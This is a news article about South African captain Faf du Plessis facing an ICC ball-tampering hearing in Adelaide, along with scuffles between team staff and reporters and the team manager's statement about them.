South African skipper Faf du Plessis will face an ICC hearing at Adelaide Oval later today, after being charged with ball tampering.
Du Plessis was charged with breaching Level 2 of the ICC Code of Conduct. He has pleaded not guilty to ‘changing the condition of the ball in breach of Law 42.3' by the ICC.
Du Plessis was caught on camera shining the ball with a lolly in his mouth and could miss the third and final Test against Australia if he is found guilty.
The stand-in captain has refused to answer any questions regarding the incident, leading to several physical altercations between Proteas' staff and journalists, keen to get a response from du Plessis.
South Africa released a statement on Monday night following an altercation with a reporter at Adelaide Airport yesterday afternoon, in which Nine News journalist Will Crouch was pushed against a window.
“This is the third incident of a reporter aggressively harassing our players,” team manager Mohammed Moosajee said.
“The ‘reporter' at the airport disrespected us and continued to harass Faf for comment.
“The ‘reporter', who also had no official accreditation, then proceeded to lunge towards Faf with an unknown object causing a direct breach of security protocol. “Throughout the tour we have respected all our media obligations and treated media with utmost respect.
